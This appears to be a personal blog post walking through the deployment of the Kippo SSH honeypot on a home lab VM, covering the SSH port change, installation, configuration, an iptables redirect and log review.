SSH HoneyPot

I like to access some of my Malware Lab while im away, so i set myself up with DynDns and some port forwarding. Opening up my home router like this is asking for trouble especially opening ports like 80, 443 and 22. So i enabled syslogging on these ports from my router.

Going through my logs i see lots of connections coming in on port 22 from all over the world, 25 Unique IP addresses over a 3 day period. I wanted to know more about these connections but all SysLog gives me is a time and an IP.

I needed more.

So i decide to set up a HoneyPot. There are several methods for setting up a honeypot but i just wanted something specific to SSH i could easily deploy on my ESXi and leave ticking along.

This is where Kippo comes in handy. Kippo is an SSH Honeypot designed to capture and record SSH Connections.

It is capable of emulating a Debian system and responds to commands. it even allows the attacker to download files to the local box. and pretends to fulfill apt-get requests. (You can limit or disable this facility).

Any action the attacker makes is recorded and logged including any files they attempted to download.

Here is a Real Life demo from the Kippo Website

http://kippo.rpg.fi/playlog/?l=20100316-233121-1847.log

Deploying Kippo

I start by deploying my standard Linux Server OVA. and set it up with external access.

Switch the standard SSH port so i can retain SSH / SCP Access to recover logs/ files without geting caught in my own trap

sudo nano /etc/ssh/sshd_config

edit the line Port 22 to something else.

in my case Port 2223

sudo ssh restart

Install Kippo

only a couple of  dependencies required for my base install.

sudo apt-get install python-twisted git
git clone https://github.com/desaster/kippo
cd kippo

Configure Kippo

cp kippo.cfg.dist kippo.cfg
nano kippo.cfg

There are a fair few configuration changes that can be made, i would advise you read through them all. As far as this install goes there is only one change required.

ssh_addr = 192.168.0.x

With Kippo configured we need to make sure that any traffic bound for port 22 is redirected to our kippo box and port.

My router doesn’t do port translation so i forward External 22 to my Kippo VM on port 22

on the kippo VM i use iptables to redirect any 22 traffic to the port Kippo is running on default of 2222

iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 22 -j REDIRECT --to-port 2222

Start Kippo

With everything set up its time to start kippo and test that everything is working.

./start.sh

Testing is easy, i jump on my phone make sure im not connected to the home wifi and attempt a connection.

With a successful connection i run a few commands then exit.

Kippo Logs

Kippo stores logs in a couple of different places all of which are detailed in the config file you should have read at the beginning :)

/log/kippo.log shows my connections and the commands i issued. Success

Now its just a matter of waiting for someone to try again.

If anyone makes a successful attempt ill publish what I find.  For now I leave you with a method for setting this up yourself.

Comments